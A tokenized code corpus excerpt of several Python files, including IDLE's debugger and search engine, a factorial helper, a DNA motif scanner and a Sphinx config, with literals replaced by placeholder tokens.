<EOL> shell . interp . 
execfile ( filename ) <EOL> if shell and cmd or script : <EOL> shell . interp . runcommand ( """<STR_LIT>""" % ( sys . argv , ) ) <EOL> if cmd : <EOL> shell . interp . execsource ( cmd ) <EOL> elif script : <EOL> shell . interp . prepend_syspath ( script ) <EOL> shell . interp . execfile ( script ) <EOL> root . mainloop ( ) <EOL> root . destroy ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . modules [ '<STR_LIT>' ] = sys . modules [ '<STR_LIT:__main__>' ] <EOL> main ( ) </s>
<s> import os <EOL> import bdb <EOL> import types <EOL> from tkinter import * <EOL> from . WindowList import ListedToplevel <EOL> from . ScrolledList import ScrolledList <EOL> from . import macosxSupport <EOL> class Idb ( bdb . Bdb ) : <EOL> def __init__ ( self , gui ) : <EOL> self . gui = gui <EOL> bdb . Bdb . __init__ ( self ) <EOL> def user_line ( self , frame ) : <EOL> if self . in_rpc_code ( frame ) : <EOL> self . set_step ( ) <EOL> return <EOL> message = self . __frame2message ( frame ) <EOL> self . gui . interaction ( message , frame ) <EOL> def user_exception ( self , frame , info ) : <EOL> if self . in_rpc_code ( frame ) : <EOL> self . set_step ( ) <EOL> return <EOL> message = self . __frame2message ( frame ) <EOL> self . gui . interaction ( message , frame , info ) <EOL> def in_rpc_code ( self , frame ) : <EOL> if frame . f_code . co_filename . count ( '<STR_LIT>' ) : <EOL> return True <EOL> else : <EOL> prev_frame = frame . f_back <EOL> if prev_frame . f_code . co_filename . count ( '<STR_LIT>' ) : <EOL> return False <EOL> return self . in_rpc_code ( prev_frame ) <EOL> def __frame2message ( self , frame ) : <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> lineno = frame . f_lineno <EOL> basename = os . path . basename ( filename ) <EOL> message = "<STR_LIT>" % ( basename , lineno ) <EOL> if code . co_name != "<STR_LIT:?>" : <EOL> message = "<STR_LIT>" % ( message , code . co_name ) <EOL> return message <EOL> class Debugger : <EOL> vstack = vsource = vlocals = vglobals = None <EOL> def __init__ ( self , pyshell , idb = None ) : <EOL> if idb is None : <EOL> idb = Idb ( self ) <EOL> self . pyshell = pyshell <EOL> self . idb = idb <EOL> self . frame = None <EOL> self . make_gui ( ) <EOL> self . interacting = <NUM_LIT:0> <EOL> def run ( self , * args ) : <EOL> try : <EOL> self . interacting = <NUM_LIT:1> <EOL> return self . idb . run ( * args ) <EOL> finally : <EOL> self . 
interacting = <NUM_LIT:0> <EOL> def close ( self , event = None ) : <EOL> if self . interacting : <EOL> self . top . bell ( ) <EOL> return <EOL> if self . stackviewer : <EOL> self . stackviewer . close ( ) ; self . stackviewer = None <EOL> self . pyshell . close_debugger ( ) <EOL> self . top . destroy ( ) <EOL> def make_gui ( self ) : <EOL> pyshell = self . pyshell <EOL> self . flist = pyshell . flist <EOL> self . root = root = pyshell . root <EOL> self . top = top = ListedToplevel ( root ) <EOL> self . top . wm_title ( "<STR_LIT>" ) <EOL> self . top . wm_iconname ( "<STR_LIT>" ) <EOL> top . wm_protocol ( "<STR_LIT>" , self . close ) <EOL> self . top . bind ( "<STR_LIT>" , self . close ) <EOL> self . bframe = bframe = Frame ( top ) <EOL> self . bframe . pack ( anchor = "<STR_LIT:w>" ) <EOL> self . buttons = bl = [ ] <EOL> self . bcont = b = Button ( bframe , text = "<STR_LIT>" , command = self . cont ) <EOL> bl . append ( b ) <EOL> self . bstep = b = Button ( bframe , text = "<STR_LIT>" , command = self . step ) <EOL> bl . append ( b ) <EOL> self . bnext = b = Button ( bframe , text = "<STR_LIT>" , command = self . next ) <EOL> bl . append ( b ) <EOL> self . bret = b = Button ( bframe , text = "<STR_LIT>" , command = self . ret ) <EOL> bl . append ( b ) <EOL> self . bret = b = Button ( bframe , text = "<STR_LIT>" , command = self . quit ) <EOL> bl . append ( b ) <EOL> for b in bl : <EOL> b . configure ( state = "<STR_LIT>" ) <EOL> b . pack ( side = "<STR_LIT:left>" ) <EOL> self . cframe = cframe = Frame ( bframe ) <EOL> self . cframe . pack ( side = "<STR_LIT:left>" ) <EOL> if not self . vstack : <EOL> self . __class__ . vstack = BooleanVar ( top ) <EOL> self . vstack . set ( <NUM_LIT:1> ) <EOL> self . bstack = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_stack , variable = self . vstack ) <EOL> self . bstack . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> ) <EOL> if not self . vsource : <EOL> self . __class__ . 
vsource = BooleanVar ( top ) <EOL> self . bsource = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_source , variable = self . vsource ) <EOL> self . bsource . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> if not self . vlocals : <EOL> self . __class__ . vlocals = BooleanVar ( top ) <EOL> self . vlocals . set ( <NUM_LIT:1> ) <EOL> self . blocals = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_locals , variable = self . vlocals ) <EOL> self . blocals . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> ) <EOL> if not self . vglobals : <EOL> self . __class__ . vglobals = BooleanVar ( top ) <EOL> self . bglobals = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_globals , variable = self . vglobals ) <EOL> self . bglobals . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> self . status = Label ( top , anchor = "<STR_LIT:w>" ) <EOL> self . status . pack ( anchor = "<STR_LIT:w>" ) <EOL> self . error = Label ( top , anchor = "<STR_LIT:w>" ) <EOL> self . error . pack ( anchor = "<STR_LIT:w>" , fill = "<STR_LIT:x>" ) <EOL> self . errorbg = self . error . cget ( "<STR_LIT>" ) <EOL> self . fstack = Frame ( top , height = <NUM_LIT:1> ) <EOL> self . fstack . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> self . flocals = Frame ( top ) <EOL> self . flocals . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> self . fglobals = Frame ( top , height = <NUM_LIT:1> ) <EOL> self . fglobals . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> if self . vstack . get ( ) : <EOL> self . show_stack ( ) <EOL> if self . vlocals . get ( ) : <EOL> self . show_locals ( ) <EOL> if self . vglobals . get ( ) : <EOL> self . show_globals ( ) <EOL> def interaction ( self , message , frame , info = None ) : <EOL> self . frame = frame <EOL> self . status . configure ( text = message ) <EOL> if info : <EOL> type , value , tb = info <EOL> try : <EOL> m1 = type . 
__name__ <EOL> except AttributeError : <EOL> m1 = "<STR_LIT:%s>" % str ( type ) <EOL> if value is not None : <EOL> try : <EOL> m1 = "<STR_LIT>" % ( m1 , str ( value ) ) <EOL> except : <EOL> pass <EOL> bg = "<STR_LIT>" <EOL> else : <EOL> m1 = "<STR_LIT>" <EOL> tb = None <EOL> bg = self . errorbg <EOL> self . error . configure ( text = m1 , background = bg ) <EOL> sv = self . stackviewer <EOL> if sv : <EOL> stack , i = self . idb . get_stack ( self . frame , tb ) <EOL> sv . load_stack ( stack , i ) <EOL> self . show_variables ( <NUM_LIT:1> ) <EOL> if self . vsource . get ( ) : <EOL> self . sync_source_line ( ) <EOL> for b in self . buttons : <EOL> b . configure ( state = "<STR_LIT>" ) <EOL> self . top . wakeup ( ) <EOL> self . root . mainloop ( ) <EOL> for b in self . buttons : <EOL> b . configure ( state = "<STR_LIT>" ) <EOL> self . status . configure ( text = "<STR_LIT>" ) <EOL> self . error . configure ( text = "<STR_LIT>" , background = self . errorbg ) <EOL> self . frame = None <EOL> def sync_source_line ( self ) : <EOL> frame = self . frame <EOL> if not frame : <EOL> return <EOL> filename , lineno = self . __frame2fileline ( frame ) <EOL> if filename [ : <NUM_LIT:1> ] + filename [ - <NUM_LIT:1> : ] != "<STR_LIT>" and os . path . exists ( filename ) : <EOL> self . flist . gotofileline ( filename , lineno ) <EOL> def __frame2fileline ( self , frame ) : <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> lineno = frame . f_lineno <EOL> return filename , lineno <EOL> def cont ( self ) : <EOL> self . idb . set_continue ( ) <EOL> self . root . quit ( ) <EOL> def step ( self ) : <EOL> self . idb . set_step ( ) <EOL> self . root . quit ( ) <EOL> def next ( self ) : <EOL> self . idb . set_next ( self . frame ) <EOL> self . root . quit ( ) <EOL> def ret ( self ) : <EOL> self . idb . set_return ( self . frame ) <EOL> self . root . quit ( ) <EOL> def quit ( self ) : <EOL> self . idb . set_quit ( ) <EOL> self . root . 
quit ( ) <EOL> stackviewer = None <EOL> def show_stack ( self ) : <EOL> if not self . stackviewer and self . vstack . get ( ) : <EOL> self . stackviewer = sv = StackViewer ( self . fstack , self . flist , self ) <EOL> if self . frame : <EOL> stack , i = self . idb . get_stack ( self . frame , None ) <EOL> sv . load_stack ( stack , i ) <EOL> else : <EOL> sv = self . stackviewer <EOL> if sv and not self . vstack . get ( ) : <EOL> self . stackviewer = None <EOL> sv . close ( ) <EOL> self . fstack [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> def show_source ( self ) : <EOL> if self . vsource . get ( ) : <EOL> self . sync_source_line ( ) <EOL> def show_frame ( self , stackitem ) : <EOL> frame , lineno = stackitem <EOL> self . frame = frame <EOL> self . show_variables ( ) <EOL> localsviewer = None <EOL> globalsviewer = None <EOL> def show_locals ( self ) : <EOL> lv = self . localsviewer <EOL> if self . vlocals . get ( ) : <EOL> if not lv : <EOL> self . localsviewer = NamespaceViewer ( self . flocals , "<STR_LIT>" ) <EOL> else : <EOL> if lv : <EOL> self . localsviewer = None <EOL> lv . close ( ) <EOL> self . flocals [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . show_variables ( ) <EOL> def show_globals ( self ) : <EOL> gv = self . globalsviewer <EOL> if self . vglobals . get ( ) : <EOL> if not gv : <EOL> self . globalsviewer = NamespaceViewer ( self . fglobals , "<STR_LIT>" ) <EOL> else : <EOL> if gv : <EOL> self . globalsviewer = None <EOL> gv . close ( ) <EOL> self . fglobals [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . show_variables ( ) <EOL> def show_variables ( self , force = <NUM_LIT:0> ) : <EOL> lv = self . localsviewer <EOL> gv = self . globalsviewer <EOL> frame = self . frame <EOL> if not frame : <EOL> ldict = gdict = None <EOL> else : <EOL> ldict = frame . f_locals <EOL> gdict = frame . f_globals <EOL> if lv and gv and ldict is gdict : <EOL> ldict = None <EOL> if lv : <EOL> lv . load_dict ( ldict , force , self . pyshell . interp . rpcclt ) <EOL> if gv : <EOL> gv . 
load_dict ( gdict , force , self . pyshell . interp . rpcclt ) <EOL> def set_breakpoint_here ( self , filename , lineno ) : <EOL> self . idb . set_break ( filename , lineno ) <EOL> def clear_breakpoint_here ( self , filename , lineno ) : <EOL> self . idb . clear_break ( filename , lineno ) <EOL> def clear_file_breaks ( self , filename ) : <EOL> self . idb . clear_all_file_breaks ( filename ) <EOL> def load_breakpoints ( self ) : <EOL> "<STR_LIT>" <EOL> for editwin in self . pyshell . flist . inversedict : <EOL> filename = editwin . io . filename <EOL> try : <EOL> for lineno in editwin . breakpoints : <EOL> self . set_breakpoint_here ( filename , lineno ) <EOL> except AttributeError : <EOL> continue <EOL> class StackViewer ( ScrolledList ) : <EOL> def __init__ ( self , master , flist , gui ) : <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> ScrolledList . __init__ ( self , master ) <EOL> else : <EOL> ScrolledList . __init__ ( self , master , width = <NUM_LIT> ) <EOL> self . flist = flist <EOL> self . gui = gui <EOL> self . stack = [ ] <EOL> def load_stack ( self , stack , index = None ) : <EOL> self . stack = stack <EOL> self . clear ( ) <EOL> for i in range ( len ( stack ) ) : <EOL> frame , lineno = stack [ i ] <EOL> try : <EOL> modname = frame . f_globals [ "<STR_LIT>" ] <EOL> except : <EOL> modname = "<STR_LIT:?>" <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> funcname = code . co_name <EOL> import linecache <EOL> sourceline = linecache . getline ( filename , lineno ) <EOL> sourceline = sourceline . strip ( ) <EOL> if funcname in ( "<STR_LIT:?>" , "<STR_LIT>" , None ) : <EOL> item = "<STR_LIT>" % ( modname , lineno , sourceline ) <EOL> else : <EOL> item = "<STR_LIT>" % ( modname , funcname , <EOL> lineno , sourceline ) <EOL> if i == index : <EOL> item = "<STR_LIT>" + item <EOL> self . append ( item ) <EOL> if index is not None : <EOL> self . select ( index ) <EOL> def popup_event ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . 
stack : <EOL> return ScrolledList . popup_event ( self , event ) <EOL> def fill_menu ( self ) : <EOL> "<STR_LIT>" <EOL> menu = self . menu <EOL> menu . add_command ( label = "<STR_LIT>" , <EOL> command = self . goto_source_line ) <EOL> menu . add_command ( label = "<STR_LIT>" , <EOL> command = self . show_stack_frame ) <EOL> def on_select ( self , index ) : <EOL> "<STR_LIT>" <EOL> if <NUM_LIT:0> <= index < len ( self . stack ) : <EOL> self . gui . show_frame ( self . stack [ index ] ) <EOL> def on_double ( self , index ) : <EOL> "<STR_LIT>" <EOL> self . show_source ( index ) <EOL> def goto_source_line ( self ) : <EOL> index = self . listbox . index ( "<STR_LIT>" ) <EOL> self . show_source ( index ) <EOL> def show_stack_frame ( self ) : <EOL> index = self . listbox . index ( "<STR_LIT>" ) <EOL> if <NUM_LIT:0> <= index < len ( self . stack ) : <EOL> self . gui . show_frame ( self . stack [ index ] ) <EOL> def show_source ( self , index ) : <EOL> if not ( <NUM_LIT:0> <= index < len ( self . stack ) ) : <EOL> return <EOL> frame , lineno = self . stack [ index ] <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> if os . path . isfile ( filename ) : <EOL> edit = self . flist . open ( filename ) <EOL> if edit : <EOL> edit . gotoline ( lineno ) <EOL> class NamespaceViewer : <EOL> def __init__ ( self , master , title , dict = None ) : <EOL> width = <NUM_LIT:0> <EOL> height = <NUM_LIT> <EOL> if dict : <EOL> height = <NUM_LIT:20> * len ( dict ) <EOL> self . master = master <EOL> self . title = title <EOL> import reprlib <EOL> self . repr = reprlib . Repr ( ) <EOL> self . repr . maxstring = <NUM_LIT> <EOL> self . repr . maxother = <NUM_LIT> <EOL> self . frame = frame = Frame ( master ) <EOL> self . frame . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> self . label = Label ( frame , text = title , borderwidth = <NUM_LIT:2> , relief = "<STR_LIT>" ) <EOL> self . label . pack ( fill = "<STR_LIT:x>" ) <EOL> self . 
vbar = vbar = Scrollbar ( frame , name = "<STR_LIT>" ) <EOL> vbar . pack ( side = "<STR_LIT:right>" , fill = "<STR_LIT:y>" ) <EOL> self . canvas = canvas = Canvas ( frame , <EOL> height = min ( <NUM_LIT> , max ( <NUM_LIT> , height ) ) , <EOL> scrollregion = ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) ) <EOL> canvas . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" , expand = <NUM_LIT:1> ) <EOL> vbar [ "<STR_LIT>" ] = canvas . yview <EOL> canvas [ "<STR_LIT>" ] = vbar . set <EOL> self . subframe = subframe = Frame ( canvas ) <EOL> self . sfid = canvas . create_window ( <NUM_LIT:0> , <NUM_LIT:0> , window = subframe , anchor = "<STR_LIT>" ) <EOL> self . load_dict ( dict ) <EOL> dict = - <NUM_LIT:1> <EOL> def load_dict ( self , dict , force = <NUM_LIT:0> , rpc_client = None ) : <EOL> if dict is self . dict and not force : <EOL> return <EOL> subframe = self . subframe <EOL> frame = self . frame <EOL> for c in list ( subframe . children . values ( ) ) : <EOL> c . destroy ( ) <EOL> self . dict = None <EOL> if not dict : <EOL> l = Label ( subframe , text = "<STR_LIT:None>" ) <EOL> l . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> ) <EOL> else : <EOL> keys_list = dict . keys ( ) <EOL> names = sorted ( keys_list ) <EOL> row = <NUM_LIT:0> <EOL> for name in names : <EOL> value = dict [ name ] <EOL> svalue = self . repr . repr ( value ) <EOL> if rpc_client : <EOL> svalue = svalue [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> l = Label ( subframe , text = name ) <EOL> l . grid ( row = row , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> l = Entry ( subframe , width = <NUM_LIT:0> , borderwidth = <NUM_LIT:0> ) <EOL> l . insert ( <NUM_LIT:0> , svalue ) <EOL> l . grid ( row = row , column = <NUM_LIT:1> , sticky = "<STR_LIT>" ) <EOL> row = row + <NUM_LIT:1> <EOL> self . dict = dict <EOL> subframe . update_idletasks ( ) <EOL> width = subframe . winfo_reqwidth ( ) <EOL> height = subframe . winfo_reqheight ( ) <EOL> canvas = self . canvas <EOL> self . 
canvas [ "<STR_LIT>" ] = ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) <EOL> if height > <NUM_LIT> : <EOL> canvas [ "<STR_LIT>" ] = <NUM_LIT> <EOL> frame . pack ( expand = <NUM_LIT:1> ) <EOL> else : <EOL> canvas [ "<STR_LIT>" ] = height <EOL> frame . pack ( expand = <NUM_LIT:0> ) <EOL> def close ( self ) : <EOL> self . frame . destroy ( ) </s>
<s> import re <EOL> from tkinter import * <EOL> import tkinter . messagebox as tkMessageBox <EOL> def get ( root ) : <EOL> if not hasattr ( root , "<STR_LIT>" ) : <EOL> root . _searchengine = SearchEngine ( root ) <EOL> return root . _searchengine <EOL> class SearchEngine : <EOL> def __init__ ( self , root ) : <EOL> self . root = root <EOL> self . patvar = StringVar ( root ) <EOL> self . revar = BooleanVar ( root ) <EOL> self . casevar = BooleanVar ( root ) <EOL> self . wordvar = BooleanVar ( root ) <EOL> self . wrapvar = BooleanVar ( root ) <EOL> self . wrapvar . set ( <NUM_LIT:1> ) <EOL> self . backvar = BooleanVar ( root ) <EOL> def getpat ( self ) : <EOL> return self . patvar . get ( ) <EOL> def setpat ( self , pat ) : <EOL> self . patvar . set ( pat ) <EOL> def isre ( self ) : <EOL> return self . revar . get ( ) <EOL> def iscase ( self ) : <EOL> return self . casevar . get ( ) <EOL> def isword ( self ) : <EOL> return self . wordvar . get ( ) <EOL> def iswrap ( self ) : <EOL> return self . wrapvar . get ( ) <EOL> def isback ( self ) : <EOL> return self . backvar . get ( ) <EOL> def getcookedpat ( self ) : <EOL> pat = self . getpat ( ) <EOL> if not self . isre ( ) : <EOL> pat = re . escape ( pat ) <EOL> if self . isword ( ) : <EOL> pat = r"<STR_LIT>" % pat <EOL> return pat <EOL> def getprog ( self ) : <EOL> pat = self . getpat ( ) <EOL> if not pat : <EOL> self . report_error ( pat , "<STR_LIT>" ) <EOL> return None <EOL> pat = self . getcookedpat ( ) <EOL> flags = <NUM_LIT:0> <EOL> if not self . iscase ( ) : <EOL> flags = flags | re . IGNORECASE <EOL> try : <EOL> prog = re . compile ( pat , flags ) <EOL> except re . error as what : <EOL> try : <EOL> msg , col = what <EOL> except : <EOL> msg = str ( what ) <EOL> col = - <NUM_LIT:1> <EOL> self . 
report_error ( pat , msg , col ) <EOL> return None <EOL> return prog <EOL> def report_error ( self , pat , msg , col = - <NUM_LIT:1> ) : <EOL> msg = "<STR_LIT>" + str ( msg ) <EOL> if pat : <EOL> msg = msg + "<STR_LIT>" + str ( pat ) <EOL> if col >= <NUM_LIT:0> : <EOL> msg = msg + "<STR_LIT>" + str ( col ) <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> msg , master = self . root ) <EOL> def setcookedpat ( self , pat ) : <EOL> if self . isre ( ) : <EOL> pat = re . escape ( pat ) <EOL> self . setpat ( pat ) <EOL> def search_text ( self , text , prog = None , ok = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if not prog : <EOL> prog = self . getprog ( ) <EOL> if not prog : <EOL> return None <EOL> wrap = self . wrapvar . get ( ) <EOL> first , last = get_selection ( text ) <EOL> if self . isback ( ) : <EOL> if ok : <EOL> start = last <EOL> else : <EOL> start = first <EOL> line , col = get_line_col ( start ) <EOL> res = self . search_backward ( text , prog , line , col , wrap , ok ) <EOL> else : <EOL> if ok : <EOL> start = first <EOL> else : <EOL> start = last <EOL> line , col = get_line_col ( start ) <EOL> res = self . search_forward ( text , prog , line , col , wrap , ok ) <EOL> return res <EOL> def search_forward ( self , text , prog , line , col , wrap , ok = <NUM_LIT:0> ) : <EOL> wrapped = <NUM_LIT:0> <EOL> startline = line <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> while chars : <EOL> m = prog . search ( chars [ : - <NUM_LIT:1> ] , col ) <EOL> if m : <EOL> if ok or m . end ( ) > col : <EOL> return line , m <EOL> line = line + <NUM_LIT:1> <EOL> if wrapped and line > startline : <EOL> break <EOL> col = <NUM_LIT:0> <EOL> ok = <NUM_LIT:1> <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> if not chars and wrap : <EOL> wrapped = <NUM_LIT:1> <EOL> wrap = <NUM_LIT:0> <EOL> line = <NUM_LIT:1> <EOL> chars = text . 
get ( "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> return None <EOL> def search_backward ( self , text , prog , line , col , wrap , ok = <NUM_LIT:0> ) : <EOL> wrapped = <NUM_LIT:0> <EOL> startline = line <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> while <NUM_LIT:1> : <EOL> m = search_reverse ( prog , chars [ : - <NUM_LIT:1> ] , col ) <EOL> if m : <EOL> if ok or m . start ( ) < col : <EOL> return line , m <EOL> line = line - <NUM_LIT:1> <EOL> if wrapped and line < startline : <EOL> break <EOL> ok = <NUM_LIT:1> <EOL> if line <= <NUM_LIT:0> : <EOL> if not wrap : <EOL> break <EOL> wrapped = <NUM_LIT:1> <EOL> wrap = <NUM_LIT:0> <EOL> pos = text . index ( "<STR_LIT>" ) <EOL> line , col = map ( int , pos . split ( "<STR_LIT:.>" ) ) <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> col = len ( chars ) - <NUM_LIT:1> <EOL> return None <EOL> def search_reverse ( prog , chars , col ) : <EOL> m = prog . search ( chars ) <EOL> if not m : <EOL> return None <EOL> found = None <EOL> i , j = m . span ( ) <EOL> while i < col and j <= col : <EOL> found = m <EOL> if i == j : <EOL> j = j + <NUM_LIT:1> <EOL> m = prog . search ( chars , j ) <EOL> if not m : <EOL> break <EOL> i , j = m . span ( ) <EOL> return found <EOL> def get_selection ( text ) : <EOL> try : <EOL> first = text . index ( "<STR_LIT>" ) <EOL> last = text . index ( "<STR_LIT>" ) <EOL> except TclError : <EOL> first = last = None <EOL> if not first : <EOL> first = text . index ( "<STR_LIT>" ) <EOL> if not last : <EOL> last = first <EOL> return first , last <EOL> def get_line_col ( index ) : <EOL> line , col = map ( int , index . split ( "<STR_LIT:.>" ) ) <EOL> return line , col </s>
<s> def factorial ( x ) : <EOL> if x <= <NUM_LIT:0.> : <EOL> if x == <NUM_LIT:0.> : return <NUM_LIT:1.> <EOL> else : raise ValueError ( '<STR_LIT>' % x ) <EOL> fact = <NUM_LIT:1.> <EOL> nn = <NUM_LIT> <EOL> while nn <= x : <EOL> fact = fact * nn <EOL> nn = nn + <NUM_LIT:1.> <EOL> if nn != x + <NUM_LIT:1> : raise ValueError ( '<STR_LIT>' % x ) <EOL> return fact <EOL> def combin ( x , y ) : <EOL> z = x - y <EOL> num = <NUM_LIT:1.0> <EOL> if y > z : <EOL> y , z = z , y <EOL> nn = int ( z + <NUM_LIT:1.> ) <EOL> while nn <= x : <EOL> num = num * nn <EOL> nn = nn + <NUM_LIT:1.> <EOL> if nn != x + <NUM_LIT:1> : raise ValueError ( '<STR_LIT>' % ( x , y ) ) <EOL> return num / factorial ( y ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( '<STR_LIT>' , factorial ( <NUM_LIT:6> ) ) <EOL> print ( '<STR_LIT>' , combin ( <NUM_LIT:6> , <NUM_LIT:2> ) ) </s>
<s> import re <EOL> import sys <EOL> from readfq import readfq <EOL> complement = { '<STR_LIT:A>' : '<STR_LIT:T>' , '<STR_LIT:C>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:C>' , '<STR_LIT:T>' : '<STR_LIT:A>' , '<STR_LIT:N>' : '<STR_LIT:N>' } <EOL> if len ( sys . argv ) < <NUM_LIT:3> : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> seqs = dict ( ) <EOL> infile = open ( sys . argv [ <NUM_LIT:1> ] ) <EOL> for name , seq , qual in readfq ( infile ) : <EOL> seqs [ name ] = seq <EOL> motif_str = sys . argv [ <NUM_LIT:2> ] . upper ( ) <EOL> motif_str_rc = "<STR_LIT>" . join ( [ complement [ b ] for b in motif_str [ : : - <NUM_LIT:1> ] ] ) <EOL> pat = "<STR_LIT>" % ( motif_str . replace ( "<STR_LIT:N>" , "<STR_LIT>" ) , motif_str_rc . replace ( "<STR_LIT:N>" , "<STR_LIT>" ) ) <EOL> motif = re . compile ( pat , flags = re . IGNORECASE ) <EOL> for name , seq in seqs . items ( ) : <EOL> matches = motif . finditer ( seq ) <EOL> for match in matches : <EOL> if match is not None : <EOL> if len ( sys . argv ) == <NUM_LIT:4> : <EOL> print "<STR_LIT:\t>" . join ( map ( str , ( name , match . start ( ) , match . end ( ) , sys . argv [ <NUM_LIT:3> ] ) ) ) <EOL> else : <EOL> print "<STR_LIT:\t>" . join ( map ( str , ( name , match . start ( ) , match . end ( ) ) ) ) </s>
<s> import sys <EOL> import os <EOL> import sphinx_rtd_theme <EOL> sys . path . append ( os . path . abspath ( '<STR_LIT>' ) ) <EOL> googleanalytics_id = '<STR_LIT>' <EOL> googleanalytics_enabled = True <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> disqus_shortname = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> from os import name <EOL> from pypomvisualiser . display . TKinterDisplay import TKinterDisplay <EOL> class DisplayFactory ( object ) : <EOL> '''<STR_LIT>''' <EOL> @ staticmethod <EOL> def getDisplayMechanism ( ) : <EOL> if name is "<STR_LIT>" : <EOL> display = TKinterDisplay ( ) <EOL> return display <EOL> else : <EOL> display = TKinterDisplay ( ) <EOL> return display </s>
<s> from py . xml import html <EOL> paras = "<STR_LIT>" , "<STR_LIT>" <EOL> doc = html . html ( <EOL> html . head ( <EOL> html . meta ( name = "<STR_LIT:Content-Type>" , value = "<STR_LIT>" ) ) , <EOL> html . body ( <EOL> [ html . p ( p ) for p in paras ] ) ) <EOL> print unicode ( doc ) . encode ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import sys , re <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> def u ( s ) : <EOL> return s <EOL> def unicode ( x , errors = None ) : <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> return x . __unicode__ ( ) <EOL> return str ( x ) <EOL> else : <EOL> def u ( s ) : <EOL> return unicode ( s ) <EOL> unicode = unicode <EOL> class NamespaceMetaclass ( type ) : <EOL> def __getattr__ ( self , name ) : <EOL> if name [ : <NUM_LIT:1> ] == '<STR_LIT:_>' : <EOL> raise AttributeError ( name ) <EOL> if self == Namespace : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> tagspec = self . __tagspec__ <EOL> if tagspec is not None and name not in tagspec : <EOL> raise AttributeError ( name ) <EOL> classattr = { } <EOL> if self . __stickyname__ : <EOL> classattr [ '<STR_LIT>' ] = name <EOL> cls = type ( name , ( self . __tagclass__ , ) , classattr ) <EOL> setattr ( self , name , cls ) <EOL> return cls <EOL> class Tag ( list ) : <EOL> class Attr ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . __dict__ . update ( kwargs ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( Tag , self ) . __init__ ( args ) <EOL> self . attr = self . Attr ( ** kwargs ) <EOL> def __unicode__ ( self ) : <EOL> return self . unicode ( indent = <NUM_LIT:0> ) <EOL> __str__ = __unicode__ <EOL> def unicode ( self , indent = <NUM_LIT:2> ) : <EOL> l = [ ] <EOL> SimpleUnicodeVisitor ( l . append , indent ) . visit ( self ) <EOL> return u ( "<STR_LIT>" ) . join ( l ) <EOL> def __repr__ ( self ) : <EOL> name = self . __class__ . __name__ <EOL> return "<STR_LIT>" % ( name , id ( self ) ) <EOL> 